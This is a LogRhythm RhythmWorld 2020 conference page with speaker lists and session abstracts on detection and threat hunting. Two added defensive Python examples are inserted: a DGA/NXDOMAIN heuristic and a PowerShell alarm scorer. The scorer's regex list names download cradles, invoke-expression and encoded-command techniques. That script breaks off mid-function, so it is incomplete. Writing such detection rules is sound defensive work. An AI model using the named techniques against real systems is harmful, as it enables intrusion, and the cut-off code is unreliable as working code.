RhythmWorld 2020

RhythmWorld Security Conference went virtual for the first time in 2020. Attendees were able to access the latest in security, LogRhythm best practices, and the LogWars Capture the Flag (CTF) event for free — from anywhere across the globe.
About RhythmWorld Security Conference
RhythmWorld is the ultimate cybersecurity conference to access the tools and skills you need to grow as a security professional and enhance your security operations.
Thank you for helping us make RhythmWorld 2020 one for the books. With nearly 2000 attendees from across the globe, this was our largest security conference to date.
Explore RhythmWorld 2020 Sessions On-demand
Relive the digital experience or check out the content for the first time through our on-demand library of keynotes, content sessions, and partner videos. Watch our recommended sessions or explore all content at the link below. Enjoy!
By entering RhythmWorld Security Conference you agree to the Event Registration Terms.
Why Attend?
Discover Security Trends and Best Practices
Stay on the forefront of security trends and topics with sessions led by industry experts.
Gain New Skills and Participate in Interactive Sessions
Bring key insights back to your organization and have fun along the way.
Learn from LogRhythm Practitioners and Experts
Discover the latest LogRhythm capabilities and solutions designed to strengthen your security operations.
Share and Collect Insights from Peers
Hear how other industry experts are solving their business challenges with LogRhythm.
Connect with Your LogRhythm Community
Grow relationships with your LogRhythm peers and connect with like-minded security professionals.
RhythmWorld 2020 Speakers
RhythmWorld Security Conference brought cybersecurity leaders from across the industry to provide you with the latest perspectives and thought leadership to drive your security operations.
See the list of prestigious speakers that presented at RhythmWorld 2020 below!

Abid Adam
Axiata Group, Chief Risk & Compliance Officer

Brian Albrecht
Director, Sales Engineering, LogRhythm

Jinan Budge
Principal Analyst, Forrester

James Carder
CISO, LogRhythm

Rusty Carter
Chief Product Officer, LogRhythm

Andrew Costis
Senior Threat Researcher, VMware Carbon Black

Gene Cupstid
Information Security Developer, C.H. Robinson

Avani Desai
Partner & President, Schellman & Company

Stephen Dyson
Security Operations Analyst, Penn Medicine

Andrew Hollister
LogRhythm Labs & Security Advisor to the CSO

Karen Holmes
Vice President & CISO, TrueBlue Inc.

Curtis Huff
Security Analyst, WCF Insurance

Kip James
CISO, TTEC

Sam King
CEO, Veracode

Rob Lee
Fellow, SANS Institute

Robert M. Lee
CEO, Dragos

Mark Logan
CEO, LogRhythm

Sam Masiello
CISO, Gates Corporation

Christopher Mitchell
CISO, City of Houston

Jason Miller
Chief Executive Officer, BitLyft Cyber Security

Randall Otto
Director, Global Recruiting, LogRhythm

Adam Saunders
Information Security Manager, Bourne Leisure

Jeff Schmidt
CEO, Avertium

Seth Shestack
Deputy CISO, Temple University

Eric Shiflet
Director Product Management, LogRhythm

Dilip Singh
Vice President Cyber Operations, Sedara

Christopher K. Stangl
Section Chief (Senior Executive Service), Cyber Division, FBI

Steve Surdu
Principal, Surdu Consulting

Rob Sweeney
Senior Information Security Engineer, Penn Medicine

Jake Williams
Founder, Rendition Infosec

Cindy Zhou
CMO, LogRhythm
RhythmWorld Sponsors
Connect with our sponsors to find the right technology and services for your organization.
Platinum Sponsors
Gold Sponsors
LogWars Sponsors
Agenda
View, browse, and sort the growing list of keynotes, sessions, and breakouts by track and level.
Check back often, as we will be adding more sessions and speakers. Please note that session dates and times are subject to change.
Find Your Timezone
Explore RhythmWorld Sessions
Opening Keynote feat. Seth Shestack of Temple University
Mark Logan, President & CEO, LogRhythm | Seth Shestack, Deputy CISO, Temple University
8:00 AM – 9:30 AM MDT
The Modern and Evolving Security Leader: Security Executive Panel
James Carder, CSO, LogRhythm | Karen Holmes, CISO, TrueBlue Inc. | Kip James, VP, CISO, TTEC | Chris Mitchell, CISO, City of Houston | Dilip Singh, VP of Cyber Operations, Sedara
- Advice to build and develop a security program
- Actionable tips to build a partnership with your board
- What the modern security executive looks like
- Key metrics and KPIs to show the value of your security operations program
- How your security program can enable business and become a point of differentiation
9:30 AM - 10:30 AM MDT
Women in Security Power Panel
Cindy Zhou, CMO, LogRhythm | Sam King, CEO, Veracode | Avani Desai, Founder & President, Schellman & Company
10:30 AM - 11:30 AM MDT
Custom Log Source Onboarding
Adam Shackleford, Professional Services Senior Consultant, LogRhythm | Brian Albrecht, Director, Sales Engineering, LogRhythm
11:30 AM - 12:30 PM MDT
SIEM
Purple Teaming
Brian Coulson, Principal Threat Research Engineer, LogRhythm | Dan Kaiser, Sr. Threat Research Engineer, LogRhythm | Sally Vincent, Threat Research Engineer, LogRhythm
- The theory, goals and requirements of purple team engagements
- Planning a purple Team engagement around the MITRE ATT&CK framework
- How to use LogRhythm Case, Case Tags and Playbooks to structure your purple team engagement
- Using attack simulation tools such as Red Canary Atomic Red Team in your purple team engagement
11:30 AM - 12:30 PM MDT
SOC Excellence
SAM Service and Best Practices to Keep Your LogRhythm SIEM Healthy
Brian Stern, Administrative Co-Pilot Engineer, LogRhythm | Ashley Howard, Administrative Co-Pilot Engineer, LogRhythm
Attend this webinar to learn about the Support Account Manager (SAM) service: a team of SIEM platform experts focused on SIEM administrative support, preventative care and support case monitoring, and your dedicated point of contact for anything related to LogRhythm. Some quick preventative maintenance and administrative tips will also be provided as a taste of what this service can do for you.
This session will be presented by Ashley Howard and Brian Stern from the Professional Services department, who both have years of LogRhythm SIEM support experience that they currently apply to maintaining LogRhythm environments across many different industries.
The presentation includes:
- Description of the SAM service offering
- Overview of the Diagnostic Tool used for quick health checks
- Quick tips to look for issues in the Platform Manager, Data Processor, Data Indexer and AI Engine components so they can be dealt with proactively
12:30 PM - 1:30 PM MDT
SIEM
Beating the Pen Testers: Rules and Investigations to Plant the Blue Team Flag
Curtis Huff, Security Analyst, WCF Insurance
In this session, Curtis Huff, a security analyst for WCF Insurance, will present a tale of two pen tests: the first taking place before LogRhythm was set up, and the second a year later, with alert detection fully in place. See the difference that one year on a SIEM, with the right alerts in place, can make.
You’ll learn:
- How to move detection up the attack chain
- Three common attacks you might see on Day One of a pen test
- The ways to mitigate these attacks
- Other tripwires to set up in your enterprise to facilitate early detection
12:30 PM - 1:30 PM MDT
SOC Excellence
Finance & Insurance Small Group Discussion
Attendance is capped at 30 customer attendees and will be managed on a first come, first served basis.
1:30 PM - 2:30 PM MDT
Retail Small Group Discussion
Attendance is capped at 30 customer attendees and will be managed on a first come, first served basis.
1:30 PM - 2:30 PM MDT
Government Small Group Discussion
Attendance is capped at 30 customer attendees and will be managed on a first come, first served basis.
1:30 PM - 2:30 PM MDT
Hands-on Labs Help
1:30 PM - 2:30 PM MDT
The Top 5 SmartResponse Plugins You Need Today
Jake Haldeman, Manager of Sales Engineering Operations, LogRhythm | Sam Straka, Product Owner, LogRhythm
Key takeaways:
- Demos of 5(ish) popular SmartResponse Plugins
- Insight into how SmartResponse Plugins are built, installed, and configured
- Which processes could be made more efficient with SmartResponse automation
2:30 PM - 3:30 PM MDT
SOAR
Ransomware vs. Analytic Co-Pilot: Use Cases and Threat Hunting Panel
Jake Haldeman, Manager of Sales Engineering Operations, LogRhythm | Aaron Beardslee, Analytic Co-Pilot Consultant, LogRhythm | Tim Peck, Analytic Co-Pilot Consultant, LogRhythm
In this session you will get to know two Analytic Co-Pilot Engineers, hear their war stories, and learn how they stay on top of the latest threats. We’ll also get a chance to meet the WARMIND, a server used to test malware and ransomware to help ensure AI Engine rules are tuned properly.
In this session you’ll learn:
- The definition of an Analytic Co-Pilot
- Lessons learned from Analytic Co-Pilot Engineers
- How to safely test and detonate Ransomware for research
2:30 PM - 3:30 PM MDT
SOC Excellence
Introducing: LogRhythm.Tools
Eric Hart, Technical Account Manager, LogRhythm | Matt Willems, Product Manager, LogRhythm | Gene Cupstid, Information Security Developer, C.H. Robinson
Join in our session to learn the origins of LogRhythm.Tools, step through demonstrations that span from simple examples through to solving complex tasks, and learn how you can get started exploring this new resource. Presented by co-creators Eric Hart, Gene Cupstid, and Matt Willems.
You’ll learn:
- A new, easier, way to integrate with the LogRhythm APIs
- Demonstrated examples based on real world use cases
- Where to find additional information
- How you can get started using LogRhythm.Tools
3:30 PM - 4:30 PM MDT
SOAR
LogRhythm DX and You: Learn Troubleshooting Tips and Tricks for Your Linux DX
Heather Janelle, Principal Technical Support Engineer, LogRhythm
Join this webinar to learn how to support your Linux DX and get quicker resolutions when you need to go to LogRhythm Support with an issue.
You’ll learn:
- Key log file locations and which logs to attach to a Support case
- Helpful curl commands
- Helpful Linux commands
- How to use Grafana to evaluate the health of your DX
3:30 PM - 4:30 PM MDT
SIEM
Opening Keynote feat. Abid Adam of Axiata Group
Mark Logan, President & CEO, LogRhythm | Abid Adam, Group Chief Risk & Compliance Officer, Axiata Group Berhad
8:00 PM - 9:30 PM MDT
Cybersecurity Implications on Society – It’s Security’s Time to Shine feat. Forrester
Jinan Budge, Forrester
9:30 PM - 10:30 PM MDT
Asia Pacific Regional Small Group Discussion
Attendance is capped at 30 customer attendees and will be managed on a first come, first served basis.
10:30 PM - 11:30 PM MDT
Asia Pacific Hands-on Labs Help
11:30 PM - 12:30 AM MDT
Overcoming the Skills Shortage for Modern and Effective Security Operations Panel
Andrew Hollister, LogRhythm Labs & Security Advisor to the CSO | Andrew Costis, Senior Threat Researcher, VMware Carbon Black | Randall Otto, Director, Global Recruiting, LogRhythm | Adam Saunders, Information Security Manager, Bourne Leisure
In a perfect world, your organization would staff a 24×7 SOC with highly talented cybersecurity professionals to secure its IT environment. But the truth is, a seemingly endless stream of new and complex cyber-attacks has driven the demand for qualified professionals through the roof and the number of unfilled positions has soared.
While there is no one-size-fits-all approach to solving the cybersecurity skills gap, our panel of experts will provide practical advice for finding and building a team with the right set of skills. Panelists will also discuss critical skill sets and outline resources to help you grow in your cybersecurity career. Moderated by Andrew Hollister, Senior Director of LogRhythm Labs.
You’ll learn:
- Global state of cybersecurity and recruiting
- Approaches to overcome the cybersecurity skill gap
- Tips to build experience and diversity in your security team
- Ways to grow your career
2:00 AM - 3:00 AM MDT
Gh0st Hunting with Netmon DPA Rules (And Other Cool Stuff)
Dan Crossley, Manager, Enterprise Sales Engineering, LogRhythm
Most customers use LogRhythm NetMon for network traffic visibility, but the NetMon Deep Packet Analytics (DPA) engine takes network analytics to a whole new level. DPA rules can detect malware communications such as C2 traffic and Domain Generation Algorithms (DGAs), SMB and DNS vulnerabilities, ICMP tunneling and more. The intention of this technical deep dive is to provide practical solutions to common network threat detection problems.
In this talk, I will introduce NetMon Deep Packet Analytics rules by using them to solve five example use-cases:
- Detecting Gh0st Rat communications
- Detecting a vulnerability to EternalBlue
- Detecting a DNS exploit to Windows Domain Controllers known as ‘SIGRed’
- Detecting a possible malware DGA activity
- Detecting ICMP tunneling
This talk is accompanied by a hands-on lab ‘NetMon DPA Rules’; attendees are encouraged to take part to reinforce the lessons from this session. Lastly, it is encouraged for attendees of this talk to also listen to the ‘Malware Analysis 101’ session which expands on some of the core topics within this session.
3:00 AM - 4:00 AM MDT
NetMon
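The “possible malware DGA activity” use case from the DPA session above, as an added Python example that is not a NetMon DPA rule and not LogRhythm’s code: it scores the registrable label of each DNS query for DGA-like traits (entropy, vowel ratio, digit ratio, length) and only flags a host once several such names fail to resolve, which is the burst a DGA client produces while walking unregistered candidates. The query records, addresses, thresholds and the single-label public-suffix simplification are assumptions constructed for the example.

```python
import math
from collections import Counter, defaultdict

VOWELS = set("aeiou")


def shannon_entropy(text: str) -> float:
    """Bits per character; 16 distinct characters in a 16-char label give the maximum 4.0."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def registrable_label(qname: str) -> str:
    """Label left of the TLD. Simplification (assumption): a single-label public
    suffix such as .com; production code should consult the Public Suffix List."""
    parts = qname.rstrip(".").lower().split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def dga_score(qname: str) -> int:
    """Count of DGA-like traits in the registrable label. The thresholds are
    assumptions chosen for this example, not tuned values."""
    label = registrable_label(qname)
    if len(label) < 6:
        return 0
    score = 0
    if shannon_entropy(label) >= 3.5:
        score += 1
    if sum(ch in VOWELS for ch in label) / len(label) < 0.2:
        score += 1
    if sum(ch.isdigit() for ch in label) / len(label) >= 0.25:
        score += 1
    if len(label) >= 12:
        score += 1
    return score


def nxdomain_bursts(records, min_score=2, min_names=3):
    """Return {src_ip: sorted distinct DGA-like names that failed to resolve} for
    hosts with at least min_names such failures. Name scoring alone is noisy (CDN
    and tracking labels look random too); the NXDOMAIN burst is what makes this
    worth an alarm, because a DGA client tries many unregistered candidates before
    it reaches the one the operator registered."""
    per_host = defaultdict(set)
    for src_ip, qname, rcode in records:
        if rcode == "NXDOMAIN" and dga_score(qname) >= min_score:
            per_host[src_ip].add(qname.lower())
    return {ip: sorted(names) for ip, names in per_host.items() if len(names) >= min_names}


# Constructed sample DNS observations (src_ip, query name, response code); the
# addresses and names are invented for this example.
SAMPLE_DNS = [
    ("10.0.0.5", "www.google.com", "NOERROR"),
    ("10.0.0.5", "xkqvzrtwmplbdnfg.com", "NXDOMAIN"),
    ("10.0.0.5", "pwmzk8q3rtv7bxl2.net", "NXDOMAIN"),
    ("10.0.0.5", "hjrtlqzvnbxkwmsd.org", "NXDOMAIN"),
    ("10.0.0.5", "e1234.dscb.akamaiedge.net", "NOERROR"),
    ("10.0.0.9", "www.microsoft.com", "NOERROR"),
    ("10.0.0.9", "xkqvzrtwmplbdnfg.com", "NOERROR"),  # the one candidate the operator registered
]

if __name__ == "__main__":
    for ip, names in nxdomain_bursts(SAMPLE_DNS).items():
        print(f"{ip}: {len(names)} DGA-like NXDOMAIN names, e.g. {names[0]}")
```

Running the block reports only 10.0.0.5. The registered candidate resolved by 10.0.0.9 still scores high on its own, which is why a rule would pair this heuristic with C2 beaconing indicators rather than alarm on a single random-looking name.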
Threat Intelligence Platform and LogRhythm
Oliver Gheorghe, Enterprise Sales Engineer, LogRhythm | Sander Bakker, Enterprise Sales Manager, LogRhythm
The goal of Cyber Threat Intelligence (CTI) is to take a proactive approach to InfoSec. Threat Intelligence works to aggregate external indicators of compromise (IOCs) and integrate them with a unified workflow to mature security operations.
Join this webinar to learn about the current CTI space, technologies, use cases, best practices and how your existing tools can leverage cyber threat intelligence. Presenters include Sander Bakker, a veteran in the cyber security space, and Oliver Gheorghe, a former CTI consultant and Oasis member.
You’ll learn:
- The current state of CTI
- Benefits of CTI use in daily workflows
- Common practices and use-cases within the security space
- Examples of how to use CTI within the LogRhythm Platform to drive valuable investigations
3:00 AM - 4:00 AM MDT
SIEM
Effective Ways to Leverage NetworkXDR in Your Environment
Ramy Ahmad, Manager, Enterprise Sales Engineering, LogRhythm
There’s nothing like having visibility into the internal activity of endpoints for detecting threats; but you can’t always deploy an agent on every system or get logs from them. The beauty of network monitoring is the wide visibility it provides into the interactions between endpoints, servers and the Internet at large, with relatively few points of observation throughout your network, and without touching any endpoints.
In this real training session, join Ramy Ahmad, LogRhythm sales engineer, as he discusses different real-life use cases to increase visibility into your network.
These scenarios include:
- Tracking Operational Technology (OT) and Internet of Things (IoT): OT has historically received little attention from IT and IoT is still perceived to be emerging. However, both of these areas deserve vigilance and you might be very surprised when you start analyzing them on your network.
- DNS: The bad guys depend on DNS for finding their infrastructure (e.g. command & control) and they exploit it as a communications channel. If you aren’t analyzing DNS queries on your network, you’re missing out.
- Database Traffic: At the end of the day, data is the number one thing you are trying to protect and said data lives on databases (DB). The reality is that few DB admins will permit a SIEM agent on their delicately tuned database servers. The network is a non-intrusive way of getting visibility to that plane of activity. Ramy will show you database traffic flows you didn’t even know were present. In fact, the whole Equifax breach could have been detected much sooner if they’d been monitoring DB traffic.
- Detecting Ransomware and Clear Text Passwords: Stay tuned on this one – it’s interesting!
Please join us for this hands-on and technical event where we get down and dirty with packets.
4:00 AM - 5:00 AM MDT
NetMon
Automating Adversarial Emulation with LogRhythm Echo
Daniel Crossley, Manager, Enterprise Sales Engineering, LogRhythm | Imran Hafeez, Analytic Co-Pilot Consultant, LogRhythm
4:00 AM - 5:00 AM MDT
SOC Excellence
Europe Regional Small Group Discussion
Join a conversation and share best practices with your peers in the European region. This discussion will be facilitated by Professional Services consultant, Simon McDowell and Senior Customer Success Manager, Amar Kaila.
Attendance is capped at 30 customer attendees and will be managed on a first come, first served basis.
5:00 AM - 6:00 AM MDT
Middle East, Turkey & Africa Regional Small Group Discussion
Join a conversation and share best practices with your peers in the Middle East, Turkey, and Africa regions. This discussion will be facilitated by Professional Services consultant, Haitham Ali Bushara and Customer Success Manager, Majid Dohaji.
Attendance is capped at 30 customer attendees and will be managed on a first come, first served basis.
5:00 AM - 6:00 AM MDT
European Hands-on Labs Help
6:00 AM - 7:00 AM MDT
The State of Cybersecurity Panel
James Carder, CSO, LogRhythm | Steve Surdu, Principal, Surdu Consulting | Rob Lee, Head of Faculty and Curriculum Executive Director at SANS | Jake Williams, SANS Sr. Instructor, Founder, Rendition InfoSec | Chris Stangl, Section Chief, FBI
2020 is proving to be another year of front-page ransomware attacks, state-sponsored hacking campaigns, and waves of data breaches. On top of direct attacks, security teams are facing natural disasters, a complicated geo-political environment, and changing workplace. Considering the continuously evolving threat landscape, what is the state of cybersecurity today?
In this panel, industry leaders will discuss the security industry as it stands today and their insights into the future. They’ll also cover the biggest threats, latest innovations, and their visions for the industry.
This panel is moderated by James Carder, LogRhythm Chief Security Officer. James is joined by several information security titans, including:
- Rob Lee, Head of Faculty and Curriculum Executive Director at SANS (Former member of the US Air Force Office of Special Investigations (AFOSI) and Director at Mandiant)
- Steve Surdu, Principal, Surdu Consulting (Former Vice President of Services and Incident Response at Mandiant)
- Jake Williams, Founder, Rendition Infosec (IANS Faculty Member and industry thought leader @MalwareJake)
- Chris Stangl, Section Chief, FBI
8:00 AM – 9:00 AM MDT
Cybersecurity Implications On Society – It’s Security’s Time To Shine
Jinan Budge, Principal Analyst Forrester
9:00 AM - 10:00 AM MDT
Managing Security and Operational Risk in Critical Infrastructure Panel
James Carder, CSO, LogRhythm | Jeff Schmidt, CEO, Avertium | Rob Sweeney, Senior Information Security Engineer, Penn Medicine | Stephen Dyson, Sr. Security Operations Analyst, Penn Medicine | Robert M. Lee, CEO, Dragos | Sam Masiello, CSO, Gates Corporation
Attacks on operational technology (OT) have been on the rise for over a decade. The rise began with the Stuxnet worm that attacked Programmable Logic Controllers (PLCs) in SCADA systems and has increased sharply in the last few years. Not only do these attacks threaten national interests, but as OT continues to be vital in day-to-day operations, overall business continuity is also endangered. As such, detecting OT threats has become a top priority as governments and organizations around the world implement programs and deliver mandates to protect critical infrastructure and business operations, across all sectors and verticals.
While limiting security and operational risk is a crucial issue, sometimes it’s easier said than done. Join this panel to hear security experts from across industries discuss business challenges, ways to evaluate risk, and strategies to reduce business risk with operational technology.
Moderated by James Carder, LogRhythm Chief Security Officer.
You’ll learn:
- Overview of operational risk and the technologies associated with different critical industries
- How security plays a role in operations and achieving business continuity
- Ways your peers have effectively met business challenges
- Recommendations to manage security and operational Risk
10:00 AM - 11:00 AM MDT
LogRhythm Troubleshooting
Justin Henning, Solutions Engineer , LogRhythm | Joseph Mastromarino, Manager, Sales Engineering , LogRhythm
Maintaining the health of your LogRhythm deployment is critical to keep your security and operations program running smoothly. In this session, experts from LogRhythm will take an in-depth look at diagnosing and resolving root causes for three different common issues, using proven methodology from the field.
You’ll learn:
- Troubleshooting best practices
- Where to find additional troubleshooting resources
- Tips to working with Support to help quickly resolve tickets
11:00 AM - 12:00 PM MDT
SIEM
Malware Analysis 101
Dan Crossley, Manager, Enterprise Sales Engineering, LogRhythm | Sally Vincent, Threat Research Engineer, LogRhythm
A malware analyst is made up of two parts: one part reverse engineer and one part detective. The goal of these white hats is to understand how a piece of malware works in order to ultimately help detect and defend against it. This exciting area of cybersecurity is not limited to specialized engineers with formal education, as many resources are available for those willing to learn.
In this webinar, cybersecurity veterans Daniel Crossley and Sally Vincent will give an overview of malware analysis. Additionally, the pair will provide the tools and techniques to start your own malware analysis lab.
Key takeaways:
- How to build a malware analysis lab
- Static analysis techniques
- Dynamic analysis techniques
- Introduction to disassembly
11:00 AM - 12:00 PM MDT
Threat Hunting
Improving Threat Hunting With LogRhythm
Marcos Schejtman, Principal Sales Engineer, LogRhythm | Luis Castaneda, Enterprise Sales Representative, LogRhythm
Cybercriminals can compromise systems in just a matter of minutes. However, it could take weeks or even months to detect a possible threat. To reduce your mean time to detect (MTTD) and your mean time to respond (MTTR) to cyberthreats, you need to find a solution to automate your threat hunting capabilities.
This session will cover best practices to improve your threat hunting using LogRhythm.
You’ll learn:
- Threat Hunting Techniques
- Risk-Based Priority and Dashboard Cache
- Configuring LogRhythm Dashboards
- AI Engine Tuning
- Playbooks and SmartResponse Plugin Best Practices
11:00 AM - 12:00 PM MDT
Threat Hunting
Designing a Resilient Enterprise Logging Architecture
Andrew Pettet, Enterprise Sales Engineer | Jake Haldeman, Manager, Sales Engineering Operations, LogRhythm
Every organization is unique, with a different set of operational circumstances governing specific requirements and the scope of implementation. A network might be highly segmented due to security policies or geographic distribution, mandating specific collection capabilities. Or an organization might be constrained by budget and staffing limitations, requiring an incremental approach to rolling out a deployment. No matter the circumstances, architecture plays an important role in determining the long-term success of any SIEM implementation.
In this session, learn the different architectural components of LogRhythm and the benefits of a proper configuration. Using real-world examples taken from the field, presenters will outline the advantages of the LogRhythm Unified License Program (ULP) and how you can add resilience to your LogRhythm deployment.
You’ll learn:
- LogRhythm architecture basics
- Ways to thoughtfully expand your existing environment and how to structure entities
- The benefits of ULP
- Key metrics to measure your security maturity
12:00 PM - 1:00 PM MDT
SIEM
The Power of NetMon
Soren Frederiksen, Professional Services Consultant, LogRhythm
12:00 PM - 1:00 PM MDT
NetMon
LogRhythm and Jupyter Notebook
Brian Coulson, Principal Threat Research Engineer, LogRhythm | Sally Vincent, Threat Research Engineer, LogRhythm | Dan Kaiser, Threat Research Sr. Engineer, LogRhythm
In his article “The Githubification of InfoSec”, John Lambert writes: “If organizations were to contribute and share their unique expertise using these frameworks, and organizations were in this way to build on the expertise of others, defenders in every organization would benefit from the best defense in any organization.” We will explore how Jupyter Notebook can be used with LogRhythm in ways that champion the concept John describes.
Dan Kaiser, threat research senior engineer, Sally Vincent, threat research engineer, and Brian Coulson, principal threat research engineer, will demonstrate three distinct projects using Jupyter Notebook and its integrations with LogRhythm. You will see how Jupyter Notebook uses the LogRhythm REST API, works with Case and Search, queries MITRE ATT&CK, and performs threat hunting in a shareable manner.
You’ll learn:
- What is Jupyter Notebook, and how to install it
- Integration with the LogRhythm REST API
- Jupyter Notebook and LogRhythm Use Cases
- Shareable LogRhythm Jupyter Notebooks created by LogRhythm Labs
12:00 PM - 1:00 PM MDT
Threat Hunting
Media/Technology Small Group Discussion
Join a conversation and share best practices with your peers in the Media and Technology Industry. This discussion will be facilitated by Professional Services Consultant, Connor Lutz and Senior Customer Success Manager, Brandon Fox.
Attendance is capped at 30 customer attendees and will be managed on a first come, first served basis.
1:00 PM - 2:00 PM MDT
Healthcare Small Group Discussion
Join a conversation and share best practices with your peers in the Healthcare industry. This discussion will be facilitated by Senior Professional Services Consultant, Derek Dalby and Senior Customer Success Manager, Amanda Wills.
Attendance is capped at 30 customer attendees and will be managed on a first come, first served basis.
1:00 PM - 2:00 PM MDT
Education Small Group Discussion
Join a conversation and share best practices with your peers in the Education space. This discussion will be facilitated by Senior Professional Services Consultant, Scott McDonough and Customer Success Manager, Amy Johnson.
Attendance is capped at 30 customer attendees and will be managed on a first come, first served basis.
1:00 PM - 2:00 PM MDT
LATAM Small Group Discussion
Join a conversation and share best practices with your peers in the Latin America region. This discussion will be facilitated by our Sales Engineers in the region, Marcos Schejtman, Carlos Alcocer, and Luis Rico and Customer Success Manager, Neri Perez.
Attendance is capped at 30 customer attendees and will be managed on a first come, first served basis.
1:00 PM - 2:00 PM MDT
Hands-on Labs Help
1:00 PM - 2:00 PM MDT
Using LogRhythm to Defend Your Organization Against Ransomware
Sean Heffley, Senior Sales Engineer, LogRhythm | Aaron Beardslee, Analytic Co-Pilot Consultant, LogRhythm
As ransomware attacks continue to hit the headlines around the globe they pose a major threat to businesses of all sizes. How do you protect your organization against ransomware effectively to reduce risk?
This session will discuss how to use LogRhythm to defend your organization against ransomware.
You’ll learn:
- Updates on the most recent attacks
- Deep technical analysis on what happens on an endpoint that is infected by Ransomware
- How to defend your organization against Ransomware
- Using LogRhythm to quickly identify and remediate a ransomware attack.
2:00 PM - 3:00 PM MDT
SIEM
Threat Hunting with NetworkXDR
Eric Brown, Sr. Security Analyst, LogRhythm | Brian Coulson, Principal Threat Research Engineer, LogRhythm
2:00 PM - 3:00 PM MDT
NetMon
Threat Hunting With ATT&CK Technique “X”
Brian Coulson, Principal Threat Research Engineer, LogRhythm | Dan Kaiser, Sr. Threat Research Engineer, LogRhythm | Sally Vincent, Threat Research Engineer, LogRhythm
Threat hunting with MITRE ATT&CK techniques can be approached in several ways. Join members of the LogRhythm Labs team as they take you on a journey of how to use MITRE ATT&CK techniques and LogRhythm to make your threat hunting activities more valuable and effective. They will start the journey using the known techniques of MITRE ATT&CK Group APT29, also known as the Russian threat actor group The Dukes or Cozy Bear. The team will describe the known Indicators of Compromise (IOCs), such as file hashes and IP addresses, and how IOCs play into MITRE ATT&CK technique searches and dashboards. Finally, the team will dig into more unknown, or suspicious, activity based on the techniques by focusing on encoded PowerShell.
You’ll Learn:
- Threat hunting made easy using MITRE ATT&CK techniques
- How to create custom LogRhythm dashboards and searches.
- Moving from known, to unknown, and back to known to increase your detection capabilities
2:00 PM - 3:00 PM MDT
Threat Hunting
Unleash the Power of Analyze
Travis Holland, Sr. Professional Services Consultant, LogRhythm
The LogRhythm NextGen SIEM Platform is undeniably a powerful tool; unfortunately some customers aren’t using the product to its full potential. This session will discuss features and best practices that can help make you more efficient in your day-to-day activities. Specifically, the presenter will cover the basics for managing a healthy events database and tips for managing the LogRhythm Web Console. Additionally, he’ll discuss standard and new features found in the Web Console, such as Tail, that can improve your effectiveness as an analyst.
You’ll learn:
- How to leverage analyze dashboards to glean powerful insights from your data
- Best practices when working with the events database
- Web Console features and functionality
3:00 PM - 4:00 PM MDT
SIEM
Educational Partnerships Panel
Joe Murdock, Faculty, UC Denver | Jim Kowatch, CEO, InfoSec Learning | Barry Krauss, Director of Training, LogRhythm | Jordan Kent, LogRhythm
LogRhythm and the University of Colorado Denver partnered in 2019 to develop an online graduate course in IT Risk Management. Delivered in the Spring of 2020, this course provided students with the fundamentals of security analysis in the commercial enterprise and featured hands-on labs using the LogRhythm NextGen SIEM. This course culminated in the LogRhythm Security Analyst certification exam which not only provided students an understanding of how to detect and respond to a real-world cyber threat but offered instant career marketability with an industry recognized certification.
Since then, LogRhythm has partnered with numerous other higher education institutions to provide real-world, hands on training to the security analysts of tomorrow. This panel features a conversation between LogRhythm, CU Denver, and InfoSec Learning on their goals, challenges, outcomes, lessons learned, and future plans. If you’re a customer from an institute of higher learning, or a partner with EDU customers, this is a session you don’t want to miss.
3:00 PM - 4:00 PM MDT
General
Lessons Learned in the First Year of Creating AI Engine Detection Rules
Brian Coulson, Principal Threat Research Engineer, LogRhythm | Dan Kaiser, Sr. Threat Research Engineer, LogRhythm | Sally Vincent, Threat Research Engineer, LogRhythm
On April 9th, 2019, LogRhythm Labs released the MITRE ATT&CK Module, with a focus on high efficacy technique detections. Since our initial release, we’ve learned a lot regarding what techniques are the most valuable to detect, how to optimally threat hunt using the techniques, and where we should focus next in our MITRE ATT&CK technique detections.
Dan Kaiser, threat research senior engineer, Sally Vincent, threat research engineer, and Brian Coulson, principal threat research engineer, will focus heavily on MITRE ATT&CK Technique: PowerShell, ID: T1059.001. Microsoft PowerShell is a modular shell native in Windows, and with PowerShell 7, also works on Linux and Mac. PowerShell enables users, and administrators to do tasks in a very efficient way. It also is heavily abused by adversaries performing malicious actions. How does LogRhythm Labs design a detection for a technique that can be used for good, and bad? We will present our challenges from additional logging requirements, detecting PowerShell usage, testing PowerShell detections, and how you can take detections that event heavily and create actionable alarms.
Key takeaways
- Our MITRE ATT&CK technique detection development process
- Tips and tricks for tuning technique detections into actionable alarms in your environment
- The many ways PowerShell usage can be detected
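The tuning problem the session describes, as an added example that is not LogRhythm Labs' code: take PowerShell process-creation telemetry (Windows Event ID 4688 with command-line auditing enabled, one of the additional logging requirements), score each command line against a handful of T1059.001 indicators, decode any -EncodedCommand payload so the indicators are applied to what actually executes, suppress the known-good automation that would otherwise drown the rule in events, and raise an alarm only above a threshold. The indicator weights, the threshold, the trusted parent process, the Office-parent bonus and the four sample records are assumptions constructed for this example.

```python
"""Added example (not LogRhythm Labs code): turning noisy PowerShell
telemetry into an actionable alarm for ATT&CK T1059.001.

Each record is a minimal dict of the fields an analyst gets from a
Windows 4688 event with command-line auditing: host, user, parent
process and command line. Records, weights and the allowlist below are
constructed for this example.
"""
import base64
import re

# Indicators of hostile PowerShell usage with a weight each (assumed values).
INDICATORS = [
    (r"-e(?:nc(?:odedcommand)?)?\b", 3, "encoded command"),
    (r"\b(?:iex|invoke-expression)\b", 3, "invoke-expression"),
    (r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", 3, "download cradle"),
    (r"-w(?:indowstyle)?\s+hidden", 2, "hidden window"),
    (r"-nop\b|-noprofile\b", 1, "noprofile"),
    (r"-ep\s+bypass|-executionpolicy\s+bypass", 2, "execution policy bypass"),
    (r"frombase64string", 2, "base64 decode"),
]
ENC_ARG = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.I)

# Tuning knobs (assumed): parents whose PowerShell children are expected,
# Office parents that make any PowerShell child more suspicious, threshold.
TRUSTED_PARENTS = {r"c:\windows\ccm\ccmexec.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
ALARM_THRESHOLD = 5


def encode_ps(command: str) -> str:
    """PowerShell -EncodedCommand takes base64 of UTF-16LE text."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_ps(blob: str) -> str:
    """Decode an -EncodedCommand payload; empty string if it is not one."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
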